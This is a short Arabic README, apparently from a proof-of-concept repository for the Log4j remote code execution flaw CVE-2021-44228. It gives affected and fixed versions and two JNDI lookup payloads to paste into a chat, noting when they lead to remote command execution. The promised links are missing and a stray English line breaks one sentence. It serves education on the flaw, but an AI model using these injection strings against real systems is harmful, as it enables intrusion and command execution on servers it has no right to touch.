
Log4j-RCE (CVE-2021-44228) إثبات المفهوم مع معلومات إضافية
هذا دليل إثبات للمفهوم لثغرة log4j RCE.
فيما يلي بعض الروابط الخاصة بـ CVE-2021-44228:
تؤثر هذه الثغرة على جميع إصدارات log4j2 تقريبًا وربما إصدارات log4j1. الإصدار الموصى باستخدامه هو 2.15.0 والذي يُصلح الثغرة.
${jndi:ldap://127.0.0.1/e} في الشات. إذا كان هناك منفذ مفتوح على المنفذ 389، يحاول log4j الاتصال ويعطل الاتصال اللاحق حتى انتهاء المهلة.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! وهو كائن نصي متسلسل من خادم ldap.
${jndi:ldap://127.0.0.1/exe} في الشات. إذا تم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true على true، فسيحدث تنفيذ الأوامر عن بُعد.
هذا المشروع مخصص للأغراض التعليمية فقط.